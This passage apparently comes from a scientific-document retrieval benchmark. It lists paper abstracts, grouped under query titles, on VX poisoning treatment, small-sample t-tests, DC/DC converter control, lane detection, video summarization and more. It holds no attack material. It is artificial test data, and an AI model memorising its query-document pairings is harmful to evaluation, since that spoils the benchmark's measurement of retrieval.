"text": "The nerve agent VX is most likely to enter the body via liquid contamination of the skin. After percutaneous exposure, the slow uptake into the blood, and its slow elimination result in toxic levels in plasma for a period of several hours. Consequently, this has implications for the development of toxic signs and for treatment onset. In the present study, clinical signs, toxicokinetics and effects on respiration, electroencephalogram and heart rate were investigated in hairless guinea pigs after percutaneous exposure to 500 microg/kg VX. We found that full inhibition of AChE and partial inhibition of BuChE in blood were accompanied by the onset of clinical signs, reflected by a decline in respiratory minute volume, bronchoconstriction and a decrease in heart rate. Furthermore, we investigated the therapeutic efficacy of a single dose of atropine, obidoxime and diazepam, administered at appearance of first clinical signs, versus that of repetitive dosing of these drugs on the reappearance of signs. A single shot treatment extended the period to detrimental physiological decline and death for several hours, whereas repetitive administration remained effective as long as treatment was continued. In conclusion, percutaneous VX poisoning showed to be effectively treatable when diagnosed on time and when continued over the entire period of time during which VX, in case of ineffective decontamination, penetrates the skin.",
"title": ""
},
{
"docid": "bcb615f8bfe9b2b13a4bfe72b698e4c7",
"text": "is granted to distribute this article for nonprofit, educational purposes if it is copied in its entirety and the journal is credited. PARE has the right to authorize third party reproduction of this article in print, electronic and database forms. Researchers occasionally have to work with an extremely small sample size, defined herein as N ≤ 5. Some methodologists have cautioned against using the t-test when the sample size is extremely small, whereas others have suggested that using the t-test is feasible in such a case. The present simulation study estimated the Type I error rate and statistical power of the one-and two-sample t-tests for normally distributed populations and for various distortions such as unequal sample sizes, unequal variances, the combination of unequal sample sizes and unequal variances, and a lognormal population distribution. Ns per group were varied between 2 and 5. Results show that the t-test provides Type I error rates close to the 5% nominal value in most of the cases, and that acceptable power (i.e., 80%) is reached only if the effect size is very large. This study also investigated the behavior of the Welch test and a rank-transformation prior to conducting the t-test (t-testR). Compared to the regular t-test, the Welch test tends to reduce statistical power and the t-testR yields false positive rates that deviate from 5%. This study further shows that a paired t-test is feasible with extremely small Ns if the within-pair correlation is high. It is concluded that there are no principal objections to using a t-test with Ns as small as 2. A final cautionary note is made on the credibility of research findings when sample sizes are small. The dictum \" more is better \" certainly applies to statistical inference. According to the law of large numbers, a larger sample size implies that confidence intervals are narrower and that more reliable conclusions can be reached. The reality is that researchers are usually far from the ideal \" mega-trial \" performed with 10,000 subjects (cf. Ioannidis, 2013) and will have to work with much smaller samples instead. For a variety of reasons, such as budget, time, or ethical constraints, it may not be possible to gather a large sample. In some fields of science, such as research on rare animal species, persons having a rare illness, or prodigies scoring at the extreme of an ability distribution (e.g., Ruthsatz & Urbach, 2012), …",
"title": ""
},
{
"docid": "6ae5f96cd14df30e7ac5cc6b654823df",
"text": "A succession of doctrines for enhancing cybersecurity has been advocated in the past, including prevention, risk management, and deterrence through accountability. None has proved effective. Proposals that are now being made view cybersecurity as a public good and adopt mechanisms inspired by those used for public health. This essay discusses the failings of previous doctrines and surveys the landscape of cybersecurity through the lens that a new doctrine, public cybersecurity, provides.",
"title": ""
},
{
"docid": "0c2d3216e8040d3182d6e23a1b5c0425",
"text": "This study examined how students’ achievement goals, self-efficacy and learning strategies influenced their choice of an online, hybrid or traditional learning environment. One hundred thirty-two post-secondary students completed surveys soliciting their preferences for learning environments, reasons for their preference, their motivational orientation towards learning and learning strategies used. Findings indicated that most students preferred traditional learning environments. This preference was based on how well the environment matched their personal learning style and engaged them as students. Discriminant analyses indicated significant differences in motivational beliefs and learning strategies; students who preferred traditional environments showed a mastery goal orientation and greater willingness to apply effort while learning. Students who preferred less traditional environments presented as more confident that they could manage a non-traditional class. These findings have implications for understanding students’ motivation for learning in diverse educational settings. Introduction One of the profound impacts of technological innovations in education is that of offering undergraduate and graduate classes online (Allen et al, 2004). Online education is Portions of this research were presented at the International Association for Development of the Information Society (IADIS) International Conference on Cognition and Exploratory Learning in Digital Age (CELDA), Freiburg, Germany, October 2008. British Journal of Educational Technology Vol 41 No 3 2010 349–364 doi:10.1111/j.1467-8535.2009.00993.x © 2009 The Authors. Journal compilation © 2009 Becta. Published by Blackwell Publishing, 9600 Garsington Road, Oxford OX4 2DQ, UK and 350 Main Street, Malden, MA 02148, USA. similar to other forms of e-learning, such as hybrid or blended courses (face-to-face instruction with online learning), in that all use the Internet and communication technologies to teach students who are not in the same physical location (TallentRunnels et al, 2006). This situation is clearly distinguished from more traditional learning environments in which no technological mediation of communication between teacher and students is required (see Berge & Collins, 1995; Hiltz, 1994; Kuehn, 1994; Tallent-Runnels et al). Research pertaining to why students may prefer an online education environment versus a more traditional classroom is notably sparse. Findings within the motivation literature, as related to education, have suggested that contributors to students’ learning preferences include their goals for learning (Ames, 1992), their self-efficacy or perceived competence in learning (Bandura, 1997) and their specific strategies for learning (Pintrich, Wolters & Baxter, 2000). However, explication of how students’ motivational beliefs and learning strategies influence their choice of learning environment when an online component is introduced is lacking. This lack is notable given current trends in higher education course offerings. This study was designed to address this gap and examined factors that contributed to individuals’ choice of a particular type of learning environment be it online exclusively, hybrid or traditional in nature. Learners’ motivation has been consistently linked to successful learning. For example, Galusha (1997) noted that knowledge about students’ motivation may help educators determine which students are likely to participate in and benefit from online education. 
Similarly, Tallent-Runnels et al (2006) asserted that an understanding of learners’ motivation is the key for effective instructional design. However, we know little about the motivational beliefs and learning strategies of online education learners. We do know that within traditional settings, students’ ability to sustain or increase their willingness to engage in and complete academic activities has been viewed as important for understanding learning and performance (Wolters, 1999). Studies on motivation and learning strategies also have shown that students’ motivational beliefs and learning strategies are related to involvement in learning (eg, Pintrich & Schunk, 2002; Pintrich et al, 2000; Schunk & Pajares, 2002; Zimmerman, 1989). For example, learning among mastery-oriented students results in more analytic processing of the information; students who are performance oriented process information in a more superficial manner (Ames, 1992). Motivation in the present study was defined in terms of achievement goals and selfefficacy. Achievement goals are concerned with the reasons or purposes for engaging in academic-related tasks. According to achievement goal theory, there are two contrasting goals: mastery goals and performance goals that explain the ‘why’ of engaging in academic-related tasks. Mastery goals refer to learners’ desires to increase their knowledge, understanding, competence and appreciation of the educational materials (Ames, 1992). Performance goals are concerned with learners’ desires to outperform others to demonstrate competence (performance approach) or to avoid demonstrating incompetence (performance avoidance) (Elliot & Church, 1997; Middleton & Midgley, 1997). A mastery goal is concerned with improving one’s competence. Individuals who hold 350 British Journal of Educational Technology Vol 41 No 3 2010 © 2009 The Authors. Journal compilation © 2009 Becta. mastery goals engage in learning to develop new skills and acquire knowledge (Ames). As such, these students are intrinsically motivated, exert greater effort in their learning, and use effective and varied learning strategies (Ames & Archer, 1988; Dweck & Leggett, 1988). In contrast, students holding performance goals (approach or avoidance) are concerned with outperforming others and how they are perceived by others. These students are often less engaged in their learning, avoid challenges and are usually extrinsically motivated (Ames & Archer; Dweck & Leggett). Self-efficacy is another motivational construct that has ramifications for learning. Specifically, self-efficacy refers to students’ perceptions about their ability to complete a specific task (Bandura, 1986, 1997). An established finding is that self-efficacy is a strong predictor of academic performance and course satisfaction in traditional classrooms. Findings also show that students with high academic self-efficacy are more flexible in their use of learning strategies than those with low academic self-efficacy (Bandura, 1997). How students use learning strategies is part of what is referred to as self-regulated learning (Pintrich et al, 2000), which concerns students’ use of cognitive strategies and metacognition. Strategies of self-regulated learning have been categorised into cognitive engagement, metacognitive strategies and resource management (Pintrich & Garcia, 1994). Cognitive engagement refers to the mental effort students invest in monitoring their comprehension of new material (Corno & Mandinach, 1983). 
Metacognitive knowledge pertains to students’ knowledge of themselves as learners, strategies to use for different tasks and when to use these strategies (Pintrich et al; Schneider & Pressley, 1997). Resource management refers to the behavioural component of selfregulated learning and entails using techniques such as time management. Overall, self-regulated learners are proactive and persistent in their learning (Schunk & Zimmerman, 1994), as they show proficiency monitoring and modifying their strategies to achieve their goals (Zimmerman, 1989). Similarly, they show adaptive motivational beliefs and attitudes that are likely to lead to successful learning. Clearly, motivational beliefs and learning strategies influence academic outcomes. However, research addressing learners’ motivation and learning strategies in the selection of a particular learning environment remains limited. In fact, from a motivational perspective, little is known about the type of students who are attracted to certain learning environments and why. Accordingly, this study examined the types of motivation and learning strategies reported by undergraduate and postgraduate students who preferred either online, hybrid or traditional classroom environments and their reasons for those preferences.",
"title": ""
}
] | scidocsrr |
d5df5c5860f3efe0efcaf7769609f2bb | Modeling and Analysis of a Dual-Active-Bridge-Isolated Bidirectional DC/DC Converter to Minimize RMS Current With Whole Operating Range | [
{
"docid": "a1332b94cf217fec5e3a51fe45b9ed4e",
"text": "There is large voltage deviation on the dc bus of the three-stage solid-state transformer (SST) when the load suddenly changes. The feed-forward control can effectively reduce the voltage deviation and transition time. However, conventional power feed-forward scheme of SST cannot develop the feed-forward control to the full without extra current sensor. In this letter, an energy feed-forward scheme, which takes the energy changes of inductors into consideration, is proposed for the dual active bridge (DAB) controller. A direct feed-forward scheme, which directly passes the power of DAB converter to the rectifier stage, is proposed for the rectifier controller. They can further improve the dynamic performances of the two dc bus voltages, respectively. The experimental results in a 2-kW SST prototype are provided to verify the proposed feed-forward schemes and show the superior performances.",
"title": ""
},
{
"docid": "c1a5e168f3260e70dd105310cd3fc13a",
"text": "To reduce current stress and improve efficiency of dual active bridge (DAB) dc-dc converters, various control schemes have been proposed in recent decades. Most control schemes for directly minimizing power losses from power loss modeling analysis and optimization aspect of the adopted converter are too difficult and complicated to implement in real-time digital microcontrollers. Thus, this paper focuses on a simple solution to reduce current stress and improve the efficiency of the adopted DAB converter. However, traditional current-stress-optimized (CSO) schemes have some drawbacks, such as inductance dependency and an additional load-current sensor. In this paper, a simple CSO scheme with a unified phase-shift (UPS) control, which can be equivalent to the existing conventional phase-shift controls, is proposed for DAB dc-dc converters to realize current stress optimization. The simple CSO scheme can overcome those drawbacks of traditional CSO schemes, gain the minimum current stress, and improve efficiency. Then, a comparison of single-phase-shift (SPS) control, simple CSO scheme with dual-phase-shift (CSO-DPS) control, simple CSO scheme with extended-phase-shift (CSO-EPS) control, and simple CSO scheme with UPS (CSO-UPS) control is analyzed in detail. Finally, experimental results verify the excellent performance of the proposed CSO-UPS control scheme and the correctness of theoretical analysis.",
"title": ""
}
] | [
{
"docid": "7635ad3e2ac2f8e72811bf056d29dfbb",
"text": "Nowadays, many consumer videos are captured by portable devices such as iPhone. Different from constrained videos that are produced by professionals, e.g., those for broadcast, summarizing multiple handheld videos from a same scenery is a challenging task. This is because: 1) these videos have dramatic semantic and style variances, making it difficult to extract the representative key frames; 2) the handheld videos are with different degrees of shakiness, but existing summarization techniques cannot alleviate this problem adaptively; and 3) it is difficult to develop a quality model that evaluates a video summary, due to the subjectiveness of video quality assessment. To solve these problems, we propose perceptual multiattribute optimization which jointly refines multiple perceptual attributes (i.e., video aesthetics, coherence, and stability) in a multivideo summarization process. In particular, a weakly supervised learning framework is designed to discover the semantically important regions in each frame. Then, a few key frames are selected based on their contributions to cover the multivideo semantics. Thereafter, a probabilistic model is proposed to dynamically fit the key frames into an aesthetically pleasing video summary, wherein its frames are stabilized adaptively. Experiments on consumer videos taken from sceneries throughout the world demonstrate the descriptiveness, aesthetics, coherence, and stability of the generated summary.",
"title": ""
},
{
"docid": "2cddde920b40a245a5e1b4b1abb2e92b",
"text": "The aim of this research was to understand what affects people's privacy preferences in smartphone apps. We ran a four-week study in the wild with 34 participants. Participants were asked to answer questions, which were used to gather their personal context and to measure their privacy preferences by varying app name and purpose of data collection. Our results show that participants shared the most when no information about data access or purpose was given, and shared the least when both of these details were specified. When just one of either purpose or the requesting app was shown, participants shared less when just the purpose was specified than when just the app name was given. We found that the purpose for data access was the predominant factor affecting users' choices. In our study the purpose condition vary from being not specified, to vague to be very specific. Participants were more willing to disclose data when no purpose was specified. When a vague purpose was shown, participants became more privacy-aware and were less willing to disclose their information. When specific purposes were shown participants were more willing to disclose when the purpose for requesting the information appeared to be beneficial to them, and shared the least when the purpose for data access was solely beneficial to developers.",
"title": ""
},
{
"docid": "432ff163e4dded948aa5a27aa440cd30",
"text": "Eighty-one female and sixty-seven male undergraduates at a Malaysian university, from seven faculties and a Center for Language Studies completed a Computer Self-Efficacy Scale, Computer Anxiety Scale, and an Attitudes toward the Internet Scale and give information about their use of the Internet. This survey research investigated undergraduates’ computer anxiety, computer self-efficacy, and reported use of and attitudes toward the Internet. This study also examined differences in computer anxiety, computer selfefficacy, attitudes toward the Internet and reported use of the Internet for undergraduates with different demographic variables. The findings suggest that the undergraduates had moderate computer anxiousness, medium attitudes toward the Internet, and high computer self-efficacy and used the Internet extensively for educational purposes such as doing research, downloading electronic resources and e-mail communications. This study challenges the long perceived male bias in the computer environment and supports recent studies that have identified greater gender equivalence in interest, use, and skills levels. However, there were differences in undergraduates’ Internet usage levels based on the discipline of study. Furthermore, higher levels of Internet usage did not necessarily translate into better computer self-efficacy among the undergraduates. A more important factor in determining computer self-efficacy could be the discipline of study and undergraduates studying computer related disciplines appeared to have higher self-efficacy towards computers and the Internet. Undergraduates who used the Internet more often may not necessarily feel more comfortable using them. Possibly, other factors such as the types of application used, the purpose for using, and individual satisfaction could also influence computer self-efficacy and computer anxiety. However, although Internet usage levels may not have any impact on computer self-efficacy, higher usage of the Internet does seem to decrease the levels of computer anxiety among the undergraduates. Undergraduates with lower computer anxiousness demonstrated more positive attitudes toward the Internet in this study.",
"title": ""
},
{
"docid": "9b130e155ca93228ed176e5d405fd50a",
"text": "For years educators have attempted to identify the effective predictors of scholastic achievement and several personality variables were described as significantly correlated with grade performance. Since one of the crucial practical implications of identifying the factors involved in academic achievement is to facilitate the teaching-learning process, the main variables that have been associated with achievement should be investigated simultaneously in order to provide information as to their relative merit in the population examined. In contrast with this premise, limited research has been conducted on the importance of personality traits and self-esteem on scholastic achievement. To this aim in a sample of 439 subjects (225 males) with an average age of 12.36 years (SD= .99) from three first level secondary school classes of Southern Italy, personality traits, as defined by the Five Factor Model, self-esteem and socioeconomic status were evaluated. The academic results correlated significantly both with personality traits and with some dimensions of self-esteem. Moreover, hierarchical regression analyses brought to light, in particular, the predictive value of openness to experience on academic marks. The results, stressing the multidimensional nature of academic performance, indicate a need to adopt complex approaches for undertaking action addressing students’ difficulties in attaining good academic achievement.",
"title": ""
},
{
"docid": "7f43ad2fd344aa7260e3af33d3f69e32",
"text": "Charge pump circuits are used for obtaining higher voltages than normal power supply voltage in flash memories, DRAMs and low voltage designs. In this paper, we present a charge pump circuit in standard CMOS technology that is suited for low voltage operation. Our proposed charge pump uses a cross- connected NMOS cell as the basic element and PMOS switches are employed to connect one stage to the next. The simulated output voltages of the proposed 4 stage charge pump for input voltage of 0.9 V, 1.2 V, 1.5 V, 1.8 V and 2.1 V are 3.9 V, 5.1 V, 6.35 V, 7.51 V and 8.4 V respectively. This proposed charge pump is suitable for low power CMOS mixed-mode designs.",
"title": ""
},
{
"docid": "323abed1a623e49db50bed383ab26a92",
"text": "Robust object detection is a critical skill for robotic applications in complex environments like homes and offices. In this paper we propose a method for using multiple cameras to simultaneously view an object from multiple angles and at high resolutions. We show that our probabilistic method for combining the camera views, which can be used with many choices of single-image object detector, can significantly improve accuracy for detecting objects from many viewpoints. We also present our own single-image object detection method that uses large synthetic datasets for training. Using a distributed, parallel learning algorithm, we train from very large datasets (up to 100 million image patches). The resulting object detector achieves high performance on its own, but also benefits substantially from using multiple camera views. Our experimental results validate our system in realistic conditions and demonstrates significant performance gains over using standard single-image classifiers, raising accuracy from 0.86 area-under-curve to 0.97.",
"title": ""
},
{
"docid": "07db8fea11297fea2def9440a7d614dc",
"text": "We present the 2017 Visual Domain Adaptation (VisDA) dataset and challenge, a large-scale testbed for unsupervised domain adaptation across visual domains. Unsupervised domain adaptation aims to solve the real-world problem of domain shift, where machine learning models trained on one domain must be transferred and adapted to a novel visual domain without additional supervision. The VisDA2017 challenge is focused on the simulation-to-reality shift and has two associated tasks: image classification and image segmentation. The goal in both tracks is to first train a model on simulated, synthetic data in the source domain and then adapt it to perform well on real image data in the unlabeled test domain. Our dataset is the largest one to date for cross-domain object classification, with over 280K images across 12 categories in the combined training, validation and testing domains. The image segmentation dataset is also large-scale with over 30K images across 18 categories in the three domains. We compare VisDA to existing cross-domain adaptation datasets and provide a baseline performance analysis, as well as results of the challenge.",
"title": ""
},
{
"docid": "5edc557fbcf1d9a91560739058274900",
"text": "A number of technological advances have led to a renewed interest on dynamic vehicle routing problems. This survey classifies routing problems from the perspective of information quality and evolution. After presenting a general description of dynamic routing, we introduce the notion of degree of dynamism, and present a comprehensive review of applications and solution methods for dynamic vehicle routing problems. ∗Corresponding author: gueret@mines-nantes.fr",
"title": ""
},
{
"docid": "abdd1406266d7290166eb16b8a5045a9",
"text": "Individualized manufacturing of cars requires kitting: the collection of individual sets of part variants for each car. This challenging logistic task is frequently performed manually by warehouseman. We propose a mobile manipulation robotic system for autonomous kitting, building on the Kuka Miiwa platform which consists of an omnidirectional base, a 7 DoF collaborative iiwa manipulator, cameras, and distance sensors. Software modules for detection and pose estimation of transport boxes, part segmentation in these containers, recognition of part variants, grasp generation, and arm trajectory optimization have been developed and integrated. Our system is designed for collaborative kitting, i.e. some parts are collected by warehouseman while other parts are picked by the robot. To address safe human-robot collaboration, fast arm trajectory replanning considering previously unforeseen obstacles is realized. The developed system was evaluated in the European Robotics Challenge 2, where the Miiwa robot demonstrated autonomous kitting, part variant recognition, and avoidance of unforeseen obstacles.",
"title": ""
},
{
"docid": "e818b0a38d17a77cc6cfdee2761f12c4",
"text": "In this paper, we present improved lane tracking using vehicle localization. Lane markers are detected using a bank of steerable filters, and lanes are tracked using Kalman filtering. On-road vehicle detection has been achieved using an active learning approach, and vehicles are tracked using a Condensation particle filter. While most state-of-the art lane tracking systems are not capable of performing in high-density traffic scenes, the proposed framework exploits robust vehicle tracking to allow for improved lane tracking in high density traffic. Experimental results demonstrate that lane tracking performance, robustness, and temporal response are significantly improved in the proposed framework, while also tracking vehicles, with minimal additional hardware requirements.",
"title": ""
},
{
"docid": "f6a5f4280a8352157164d6abc1259a45",
"text": "A new robust lane marking detection algorithm for monocular vision is proposed. It is designed for the urban roads with disturbances and with the weak lane markings. The primary contribution of the paper is that it supplies a robust adaptive method of image segmentation, which employs jointly prior knowledge, statistical information and the special geometrical features of lane markings in the bird's-eye view. This method can eliminate many disturbances while keep points of lane markings effectively. Road classification can help us extract more accurate and simple characteristics of lane markings, so the second contribution of the paper is that it uses the row information of image to classify road conditions into three kinds and uses different strategies to complete lane marking detection. The experimental results have shown the high performance of our algorithm in various road scenes.",
"title": ""
},
{
"docid": "dacb4491a0cf1e05a2972cc1a82a6c62",
"text": "Human parechovirus type 3 (HPeV3) can cause serious conditions in neonates, such as sepsis and encephalitis, but data for adults are lacking. The case of a pregnant woman with HPeV3 infection is reported herein. A 28-year-old woman at 36 weeks of pregnancy was admitted because of myalgia and muscle weakness. Her grip strength was 6.0kg for her right hand and 2.5kg for her left hand. The patient's symptoms, probably due to fasciitis and not myositis, improved gradually with conservative treatment, however labor pains with genital bleeding developed unexpectedly 3 days after admission. An obstetric consultation was obtained and a cesarean section was performed, with no complications. A real-time PCR assay for the detection of viral genomic ribonucleic acid against HPeV showed positive results for pharyngeal swabs, feces, and blood, and negative results for the placenta, umbilical cord, umbilical cord blood, amniotic fluid, and breast milk. The HPeV3 was genotyped by sequencing of the VP1 region. The woman made a full recovery and was discharged with her infant in a stable condition.",
"title": ""
},
{
"docid": "fe6fa144846269c7b2c9230ca9d8217b",
"text": "The paper is dedicated to plagiarism problem. The ways how to reduce plagiarism: both: plagiarism prevention and plagiarism detection are discussed. Widely used plagiarism detection methods are described. The most known plagiarism detection tools are analysed.",
"title": ""
},
{
"docid": "39351cdf91466aa12576d9eb475fb558",
"text": "Fault tolerance is a remarkable feature of biological systems and their self-repair capability influence modern electronic systems. In this paper, we propose a novel plastic neural network model, which establishes homeostasis in a spiking neural network. Combined with this plasticity and the inspiration from inhibitory interneurons, we develop a fault-resilient robotic controller implemented on an FPGA establishing obstacle avoidance task. We demonstrate the proposed methodology on a spiking neural network implemented on Xilinx Artix-7 FPGA. The system is able to maintain stable firing (tolerance ±10%) with a loss of up to 75% of the original synaptic inputs to a neuron. Our repair mechanism has minimal hardware overhead with a tuning circuit (repair unit) which consumes only three slices/neuron for implementing a threshold voltage-based homeostatic fault-tolerant unit. The overall architecture has a minimal impact on power consumption and, therefore, supports scalable implementations. This paper opens a novel way of implementing the behavior of natural fault tolerant system in hardware establishing homeostatic self-repair behavior.",
"title": ""
},
{
"docid": "7a47dde6f7cc68c092922718000a807a",
"text": "In the present study k-Nearest Neighbor classification method, have been studied for economic forecasting. Due to the effects of companies’ financial distress on stakeholders, financial distress prediction models have been one of the most attractive areas in financial research. In recent years, after the global financial crisis, the number of bankrupt companies has risen. Since companies' financial distress is the first stage of bankruptcy, using financial ratios for predicting financial distress have attracted too much attention of the academics as well as economic and financial institutions. Although in recent years studies on predicting companies’ financial distress in Iran have been increased, most efforts have exploited traditional statistical methods; and just a few studies have used nonparametric methods. Recent studies demonstrate this method is more capable than other methods.",
"title": ""
},
{
"docid": "99b485dd4290c463b35867b98b51146c",
"text": "The term rhombencephalitis refers to inflammatory diseases affecting the hindbrain (brainstem and cerebellum). Rhombencephalitis has a wide variety of etiologies, including infections, autoimmune diseases, and paraneoplastic syndromes. Infection with bacteria of the genus Listeria is the most common cause of rhombencephalitis. Primary rhombencephalitis caused by infection with Listeria spp. occurs in healthy young adults. It usually has a biphasic time course with a flu-like syndrome, followed by brainstem dysfunction; 75% of patients have cerebrospinal fluid pleocytosis, and nearly 100% have an abnormal brain magnetic resonance imaging scan. However, other possible causes of rhombencephalitis must be borne in mind. In addition to the clinical aspects, the patterns seen in magnetic resonance imaging can be helpful in defining the possible cause. Some of the reported causes of rhombencephalitis are potentially severe and life threatening; therefore, an accurate initial diagnostic approach is important to establishing a proper early treatment regimen. This pictorial essay reviews the various causes of rhombencephalitis and the corresponding magnetic resonance imaging findings, by describing illustrative confirmed cases.",
"title": ""
},
{
"docid": "dc096631d6412e06f305f83b2c8734bc",
"text": "Many important search tasks require multiple search sessions to complete. Tasks such as travel planning, large purchases, or job searches can span hours, days, or even weeks. Inevitably, life interferes, requiring the searcher either to recover the \"state\" of the search manually (most common), or plan for interruption in advance (unlikely). The goal of this work is to better understand, characterize, and automatically detect search tasks that will be continued in the near future. To this end, we analyze a query log from the Bing Web search engine to identify the types of intents, topics, and search behavior patterns associated with long-running tasks that are likely to be continued. Using our insights, we develop an effective prediction algorithm that significantly outperforms both the previous state-of-the-art method, and even the ability of human judges, to predict future task continuation. Potential applications of our techniques would allow a search engine to pre-emptively \"save state\" for a searcher (e.g., by caching search results), perform more targeted personalization, and otherwise better support the searcher experience for interrupted search tasks.",
"title": ""
},
{
"docid": "22ad9bc66f0a9274fcf76697152bab4d",
"text": "We consider the recovery of a (real- or complex-valued) signal from magnitude-only measurements, known as phase retrieval. We formulate phase retrieval as a convex optimization problem, which we call PhaseMax. Unlike other convex methods that use semidefinite relaxation and lift the phase retrieval problem to a higher dimension, PhaseMax is a “non-lifting” relaxation that operates in the original signal dimension. We show that the dual problem to PhaseMax is basis pursuit, which implies that the phase retrieval can be performed using algorithms initially designed for sparse signal recovery. We develop sharp lower bounds on the success probability of PhaseMax for a broad range of random measurement ensembles, and we analyze the impact of measurement noise on the solution accuracy. We use numerical results to demonstrate the accuracy of our recovery guarantees, and we showcase the efficacy and limits of PhaseMax in practice.",
"title": ""
},
{
"docid": "d31ff1d528902c72727a8a3946089b9e",
"text": "Small Manufacturing Entities (SMEs) have not incorporated robotic automation as readily as large companies due to rapidly changing product lines, complex and dexterous tasks, and the high cost of start-up. While recent low-cost robots such as the Universal Robots UR5 and Rethink Robotics Baxter are more economical and feature improved programming interfaces, based on our discussions with manufacturers further incorporation of robots into the manufacturing work flow is limited by the ability of these systems to generalize across tasks and handle environmental variation. Our goal is to create a system designed for small manufacturers that contains a set of capabilities useful for a wide range of tasks, is both powerful and easy to use, allows for perceptually grounded actions, and is able to accumulate, abstract, and reuse plans that have been taught. We present an extension to Behavior Trees that allows for representing the system capabilities of a robot as a set of generalizable operations that are exposed to an end-user for creating task plans. We implement this framework in CoSTAR, the Collaborative System for Task Automation and Recognition, and demonstrate its effectiveness with two case studies. We first perform a complex tool-based object manipulation task in a laboratory setting. We then show the deployment of our system in an SME where we automate a machine tending task that was not possible with current off the shelf robots.",
"title": ""
},
{
"docid": "1b421293cc38eec47c94754cd5e244ff",
"text": "We study the problem of hypothesis testing between two discrete distributions, where we only have access to samples after the action of a known reversible Markov chain, playing the role of noise. We derive instance-dependent minimax rates for the sample complexity of this problem, and show how its dependence in time is related to the spectral properties of the Markov chain. We show that there exists a wide statistical window, in terms of sample complexity for hypothesis testing between different pairs of initial distributions. We illustrate these results in several concrete examples.",
"title": ""
}
] | scidocsrr |
a5e284358add46d05c289c0061080cb7 | A Neural Attention Model for Sentence Summarization | [
{
"docid": "062c970a14ac0715ccf96cee464a4fec",
"text": "A goal of statistical language modeling is to learn the joint probability function of sequences of words in a language. This is intrinsically difficult because of the curse of dimensionality: a word sequence on which the model will be tested is likely to be different from all the word sequences seen during training. Traditional but very successful approaches based on n-grams obtain generalization by concatenating very short overlapping sequences seen in the training set. We propose to fight the curse of dimensionality by learning a distributed representation for words which allows each training sentence to inform the model about an exponential number of semantically neighboring sentences. The model learns simultaneously (1) a distributed representation for each word along with (2) the probability function for word sequences, expressed in terms of these representations. Generalization is obtained because a sequence of words that has never been seen before gets high probability if it is made of words that are similar (in the sense of having a nearby representation) to words forming an already seen sentence. Training such large models (with millions of parameters) within a reasonable time is itself a significant challenge. We report on experiments using neural networks for the probability function, showing on two text corpora that the proposed approach significantly improves on state-of-the-art n-gram models, and that the proposed approach allows to take advantage of longer contexts.",
"title": ""
}
] | [
{
"docid": "1f6b1757282fda5bae06cd0617054642",
"text": "A crucial step toward the goal of automatic extraction of propositionalinformationfrom naturallanguagetext is the identificationof semanticrelations betweenconstituentsin sentences.We examinethe problemof distinguishing amongsevenrelationtypesthatcanoccurbetweentheentities“treatment”and “disease” in biosciencetext, and the problemof identifyingsuchentities.We comparefive generati ve graphicalmodels anda neuralnetwork, usinglexical, syntactic,andsemanticfeatures,finding that thelatterhelpachieve high classificationaccuracy.",
"title": ""
},
{
"docid": "abc75d5b44323133d2b1ffef57a920f3",
"text": "With the increasing adoption of mobile 4G LTE networks, video streaming as the major contributor of 4G LTE data traffic, has become extremely hot. However, the battery life has become the bottleneck when mobile users are using online video services. In this paper, we deploy a real mobile system for power measurement and profiling of online video streaming in 4G LTE networks. Based on some designed experiments with different configurations, we measure the power consumption for online video streaming, offline video playing, and mobile background. A RRC state study is taken to understand how RRC states impact power consumption. Then, we profile the power consumption of video streaming and show the results with different impact factors. According to our experimental statistics, the power saving room for online video streaming in 4G LTE networks can be up to 69%.",
"title": ""
},
{
"docid": "028cdddc5d61865d0ea288180cef91c0",
"text": "This paper investigates the use of Convolutional Neural Networks for classification of painted symbolic road markings. Previous work on road marking recognition is mostly based on either template matching or on classical feature extraction followed by classifier training which is not always effective and based on feature engineering. However, with the rise of deep neural networks and their success in ADAS systems, it is natural to investigate the suitability of CNN for road marking recognition. Unlike others, our focus is solely on road marking recognition and not detection; which has been extensively explored and conventionally based on MSER feature extraction of the IPM images. We train five different CNN architectures with variable number of convolution/max-pooling and fully connected layers, and different resolution of road mark patches. We use a publicly available road marking data set and incorporate data augmentation to enhance the size of this data set which is required for training deep nets. The augmented data set is randomly partitioned in 70% and 30% for training and testing. The best CNN network results in an average recognition rate of 99.05% for 10 classes of road markings on the test set.",
"title": ""
},
{
"docid": "1d2de6042cb07b0b29d3e1f99483fa5c",
"text": "The incorporation of prior knowledge into learning is essential in achieving good performance based on small noisy samples. Such knowledge is often incorporated through the availability of related data arising from domains and tasks similar to the one of current interest. Ideally one would like to allow both the data for the current task and for previous related tasks to self-organize the learning system in such a way that commonalities and differences between the tasks are learned in a datadriven fashion. We develop a framework for learning multiple tasks simultaneously, based on sharing features that are common to all tasks, achieved through the use of a modular deep feedforward neural network consisting of shared branches, dealing with the common features of all tasks, and private branches, learning the specific unique aspects of each task. Once an appropriate weight sharing architecture has been established, learning takes place through standard algorithms for feedforward networks, e.g., stochastic gradient descent and its variations. The method deals with domain adaptation and multi-task learning in a unified fashion, and can easily deal with data arising from different types of sources. Numerical experiments demonstrate the effectiveness of learning in domain adaptation and transfer learning setups, and provide evidence for the flexible and task-oriented representations arising in the network.",
"title": ""
},
{
"docid": "78c8331beb0d09570c4063fab7d21f2d",
"text": "This paper presents a new single stage dc-dc boost converter topology with very large gain conversion ratio as a switched inductor multilevel boost converter (SIMLBC). It is a PWM-based dc-dc converter which combines the Switched-Inductor Structures and the switching capacitor function to provide a very large output voltage with different output dc levels which makes it suitable for multilevel inverter applications. The proposed topology has only single switch like the conventional dc-dc converter which can be controlled in a very simple way. In addition to, two inductors, 2N+2 diodes, N is the number of output dc voltage levels, and 2N-1 dc capacitors. A high switching frequency is employed to decrease the size of these components and thus much increasing the dynamic performance. The proposed topology has been compared with the existence dc-dc boost converters and it gives a higher voltage gain conversion ratio. The proposed converter has been analyzed, simulated and a prototype has been built and experimentally tested. Simulation and experimental results have been provided for validation.",
"title": ""
},
{
"docid": "853b3fc8a979abd7e13a87b5c3b4a264",
